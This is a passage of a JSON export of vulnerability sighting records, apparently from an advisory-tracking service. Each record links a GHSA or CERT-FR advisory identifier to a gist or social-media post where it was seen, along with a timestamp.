"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/15d6661c566b3f7011158e747a52036b", "content": "", "creation_timestamp": "2025-07-16T05:57:09.000000Z"}, {"uuid": "2790dafc-d3d3-4c88-873f-a69028ddf44f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrpq-qp53-qv56", "type": "seen", "source": "https://gist.github.com/safer-bot/15d6661c566b3f7011158e747a52036b", "content": "", "creation_timestamp": "2025-07-16T05:57:09.000000Z"}, {"uuid": "44b38ab2-9cac-46ec-aa59-c83ca11f6ddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/15d6661c566b3f7011158e747a52036b", "content": "", "creation_timestamp": "2025-07-16T05:57:09.000000Z"}, {"uuid": "64481c72-6c98-4b7c-9a8d-a4ef5026dcc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/15d6661c566b3f7011158e747a52036b", "content": "", "creation_timestamp": "2025-07-16T05:57:09.000000Z"}, {"uuid": "0b0980da-430c-43d5-acbd-a2b11342baeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/15d6661c566b3f7011158e747a52036b", "content": "", "creation_timestamp": "2025-07-16T05:57:09.000000Z"}, {"uuid": "ec315f6b-28be-49a6-b9e1-9abd9f772b31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3p86-9955-h393", "type": "seen", "source": "https://gist.github.com/safer-bot/15d6661c566b3f7011158e747a52036b", "content": "", "creation_timestamp": "2025-07-16T05:57:09.000000Z"}, {"uuid": "4d5c2808-63a9-4162-96b8-91c0824d961b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/ce34db1d95479baef7d33f719209460e", "content": "", "creation_timestamp": "2025-07-16T05:58:53.000000Z"}, {"uuid": "d553387f-fb3a-4489-8402-914322c8ae45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/ce34db1d95479baef7d33f719209460e", "content": "", "creation_timestamp": "2025-07-16T05:58:53.000000Z"}, {"uuid": "1fca87af-1da0-4203-bb0a-02c3c0492b64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/ce34db1d95479baef7d33f719209460e", "content": "", "creation_timestamp": "2025-07-16T05:58:53.000000Z"}, {"uuid": "61699083-693a-4bdb-878a-4c2cb4856c4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/ce34db1d95479baef7d33f719209460e", "content": "", "creation_timestamp": "2025-07-16T05:58:53.000000Z"}, {"uuid": "69032739-3793-455d-9270-7f5345e8cf9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/ce34db1d95479baef7d33f719209460e", "content": "", "creation_timestamp": "2025-07-16T05:58:53.000000Z"}, {"uuid": "9952085a-ac3b-443e-af76-6a8818b25b9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xj56-p8mm-qmxj", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lstfgyuiuf2g", "content": "", "creation_timestamp": "2025-06-30T14:29:11.863029Z"}, {"uuid": "25d8ea68-4161-4b48-9ba2-4a2bf23c7418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-024", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lrazcguxpr27", "content": "", "creation_timestamp": "2025-06-10T13:38:46.980481Z"}, {"uuid": "a416bf61-ffb2-4de1-80ce-0a5755a7af75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/07f90bccf8ee58e3981ea9deaeae211c", "content": "", "creation_timestamp": "2025-07-16T06:00:32.000000Z"}, {"uuid": "a27c9d3b-b7be-40ac-827d-7f763caa2e5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/07f90bccf8ee58e3981ea9deaeae211c", "content": "", "creation_timestamp": "2025-07-16T06:00:32.000000Z"}, {"uuid": "03e9eb23-9066-42f6-8b23-f71e2ae81ad9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/6f9270e74a6a657901cb16bdeed9866a", "content": "", "creation_timestamp": "2025-07-16T09:48:13.000000Z"}, {"uuid": "84860c5c-4635-434d-b65a-7f9ff0d0a689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "2c2b98a5-7bc6-473f-b37f-bd61c24b7579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "fafe0315-451c-48a2-a139-ca2a3209b869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-024", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114659342788625601", "content": "", "creation_timestamp": "2025-06-10T13:38:48.101095Z"}, {"uuid": "722cb811-a20c-4c52-a133-674da447bc16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/07f90bccf8ee58e3981ea9deaeae211c", "content": "", "creation_timestamp": "2025-07-16T06:00:32.000000Z"}, {"uuid": "e6a5fe91-3456-4456-a5ce-85e29488abac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/01c009a45b4602ca3dfaa56fc5ddca17", "content": "", "creation_timestamp": "2025-07-16T09:48:47.000000Z"}, {"uuid": "ed38f03f-b662-4955-aee6-cd34b9b20cb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/730d6c4532e5ceecde5e8f83703412a9", "content": "", "creation_timestamp": "2025-07-16T13:55:05.000000Z"}, {"uuid": "3f3276f0-c654-4300-b6f0-fe4e6aa8ef3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/c4c64c45764712e3ac0ba621c5518451", "content": "", "creation_timestamp": "2025-07-16T14:31:41.000000Z"}, {"uuid": "2d6b64d8-4b32-4fc1-860f-74cf665ccac1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vgg9-87g3-85w8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114830630125204075", "content": "", "creation_timestamp": "2025-07-10T19:39:23.567203Z"}, {"uuid": "b721f92b-6b8e-4e38-b55f-69278d56f4a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/967981e36cbffc9eaea013dfcc2267e6", "content": "", "creation_timestamp": "2025-06-14T04:28:21.000000Z"}, {"uuid": "f9657535-4d6a-431b-bca8-222cf60f81f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/3c07d6cb9d4d50c65b92850fe6b9f2d9", "content": "", "creation_timestamp": "2025-06-16T20:08:28.000000Z"}, {"uuid": "59d58b2c-f41f-4269-8f3c-00ca02367dbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/3c07d6cb9d4d50c65b92850fe6b9f2d9", "content": "", "creation_timestamp": "2025-06-16T20:08:28.000000Z"}, {"uuid": "b7a0606b-0804-4b62-87a1-adacf3b291fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/3c07d6cb9d4d50c65b92850fe6b9f2d9", "content": "", "creation_timestamp": "2025-06-16T20:08:28.000000Z"}, {"uuid": "f9b2fe03-9d89-42dc-b155-00322e750110", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/3c07d6cb9d4d50c65b92850fe6b9f2d9", "content": "", "creation_timestamp": "2025-06-16T20:08:28.000000Z"}, {"uuid": "3ae11503-55da-4575-a633-45794a23d983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w6q7-j642-7c25", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114598146975884055", "content": "", "creation_timestamp": "2025-05-30T18:15:52.238231Z"}, {"uuid": "c75a5c75-96e0-41ec-ba3f-f64434ba53e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/a749932e6734a7bd94b0cf7099c8652e", "content": "", "creation_timestamp": "2025-06-14T04:30:23.000000Z"}, {"uuid": "bc74c205-84a3-4fb4-8610-f3de2ca15a7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/b7efd49631eccbaf351804d31652b09c", "content": "", "creation_timestamp": "2025-06-16T20:16:57.000000Z"}, {"uuid": "e0de55a5-7dba-4e7f-914c-854a548478f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/b7efd49631eccbaf351804d31652b09c", "content": "", "creation_timestamp": "2025-06-16T20:16:57.000000Z"}, {"uuid": "e9792a4c-0211-4111-a632-265676baf3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/ab212c88d5c9cea48d06222e20463fe0", "content": "", "creation_timestamp": "2025-06-14T04:32:59.000000Z"}, {"uuid": "76f25c87-6adf-4a3f-8669-bfdb9bbd99d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/b7efd49631eccbaf351804d31652b09c", "content": "", "creation_timestamp": "2025-06-16T20:16:57.000000Z"}, {"uuid": "46a88eac-ab34-4d0e-8216-70f6bfaae1b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "b0b4f4c3-e10f-4a6f-bfe4-510753572913", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "11a302ad-a60e-4fa2-be7e-048b3e3eace5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "33cb578f-6983-4b6e-a138-eb104c3c8840", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvpg-vgmx-xg6w", "type": "seen", "source": "https://gist.github.com/safer-bot/0181ba5f2e0bc6f3fcdfb54d0ee5b027", "content": "", "creation_timestamp": "2025-07-16T06:12:50.000000Z"}, {"uuid": "d53e9d12-e575-4cc6-ae18-2ed53c1bde04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/de7d7358afd459533532734f554ae27b", "content": "", "creation_timestamp": "2025-06-14T04:47:27.000000Z"}, {"uuid": "55683c90-6ff4-440b-a4e0-d8926c18d03d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "730198d6-3ab2-40d4-bd02-9ce49e8b8f2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "930f3737-df00-4a3d-9989-c0479fedc78a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "8e1ecde3-a41c-4d6e-9d75-b889365a4192", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "ea11ef13-6de9-4e86-86c2-36b89765953b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w6q7-j642-7c25", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lqftpll67w22", "content": "", "creation_timestamp": "2025-05-30T18:16:52.574343Z"}, {"uuid": "01d4aa7b-78cb-4027-a498-6fd698e9e966", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9wj4-8h85-pgrw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114660037799326357", "content": "", "creation_timestamp": "2025-06-10T16:35:31.174203Z"}, {"uuid": "ce618c61-64e6-4b81-b2e1-b3f64258168a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m9jh-jf9h-x3h2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114660037799326357", "content": "", "creation_timestamp": "2025-06-10T16:35:31.274792Z"}, {"uuid": "dd8e8908-66e7-48ac-817a-c493e8e84e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/94211835c23af484dee8d357148ae324", "content": "", "creation_timestamp": "2025-06-14T04:48:53.000000Z"}, {"uuid": "abcd6c5c-036d-4a54-b5b0-f6088765abc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "b950e029-1622-433a-8ad2-e8cc57678445", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-859r-vvv8-rm8r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114548409339459848", "content": "", "creation_timestamp": "2025-05-21T23:26:56.224783Z"}, {"uuid": "5905b9be-ce78-4985-b489-3475edd40697", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-021", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lpjkt4sinn2g", "content": "", "creation_timestamp": "2025-05-19T12:23:14.974414Z"}, {"uuid": "0a7c5db3-7a3e-4109-b38d-c2a6ba10f738", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-021", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114534474947199584", "content": "", "creation_timestamp": "2025-05-19T12:23:15.041031Z"}, {"uuid": "a11e2e34-98ef-4085-a534-4a5e04846e5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/21fb426253787df34be6b6701844c05e", "content": "", "creation_timestamp": "2025-06-14T04:51:17.000000Z"}, {"uuid": "35a08931-ac4f-4c9d-9d14-05609402aa99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "8ea7d126-cf9c-4b89-9329-46fc28f95286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "f00094cf-55d9-44e3-a8fd-26d856d83402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/8eded6b925c160dc08c1b28d51d6c0c3", "content": "", "creation_timestamp": "2025-06-16T20:20:39.000000Z"}, {"uuid": "65d34a48-1c36-45f5-8335-800597b2fd97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h87r-5w74-qfm4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114823801833628508", "content": "", "creation_timestamp": "2025-07-09T14:42:52.147919Z"}, {"uuid": "d230a458-561d-42be-a2f6-55fc8c8dce59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7v4r-c989-xh26", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114308819955492247", "content": "", "creation_timestamp": "2025-04-09T15:56:12.186986Z"}, {"uuid": "1fcd6e9f-8f1d-43ea-9229-28852c4da752", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/47006014379551b412652b892b869485", "content": "", "creation_timestamp": "2025-07-16T06:26:25.000000Z"}, {"uuid": "d7b6c567-bfa3-4061-a4cf-3c39bafc09bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/47006014379551b412652b892b869485", "content": "", "creation_timestamp": "2025-07-16T06:26:25.000000Z"}, {"uuid": "96772d28-e36f-4e37-9af9-c6dad3b705fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h67g-mpq5-6ph5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114857277247409913", "content": "", "creation_timestamp": "2025-07-15T12:36:07.599597Z"}, {"uuid": "d67a3f40-2f4f-4f07-87e8-b957eee99b91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxqc-pxw9-g2p8", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "29eb9287-90bd-4072-a017-3c535a612fd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4q3-7g4q-x89m", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "18d44675-1a22-4545-a0db-78e466339ac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-564r-hj7v-mcr5", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "8dc76b6d-9bc1-45d2-9c11-14fb858cd287", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27g3-pmvp-j9cv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114315587733303001", "content": "", "creation_timestamp": "2025-04-10T20:37:20.666870Z"}, {"uuid": "1e674d97-ef84-421f-b4ed-b8fb0aa26167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7m5c-cqx4-x8mp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114315587733303001", "content": "", "creation_timestamp": "2025-04-10T20:37:20.834103Z"}, {"uuid": "182d5aa7-4023-4245-a1f2-f2fdff1ed5cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27g3-pmvp-j9cv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114316233278588016", "content": "", "creation_timestamp": "2025-04-10T23:21:30.781047Z"}, {"uuid": "0713ccd2-9932-4415-b545-76c63b2c4267", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x8c9-8553-j9px", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114316233278588016", "content": "", "creation_timestamp": "2025-04-10T23:21:30.940200Z"}, {"uuid": "0f9680cc-1bbf-4262-9557-0f3663c4b96b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-924c-vvm5-9mqx", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114316233278588016", "content": "", "creation_timestamp": "2025-04-10T23:21:31.093701Z"}, {"uuid": "4e2736fa-8dd4-4ef7-a0f5-ab491a7008db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jr6h-r7vg-f9mc", "type": "seen", "source": "https://gist.github.com/safer-bot/dcba38acd7b3b589f657659fa2a6b641", "content": "", "creation_timestamp": "2025-07-16T06:27:33.000000Z"}, {"uuid": "33a4c773-2b71-4571-8fef-3f00eb4b1faa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rwp7-7vc6-8477", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114281067875557615", "content": "", "creation_timestamp": "2025-04-04T18:18:29.379436Z"}, {"uuid": "e47f7809-3603-4fc6-aa56-19add6a556ae", 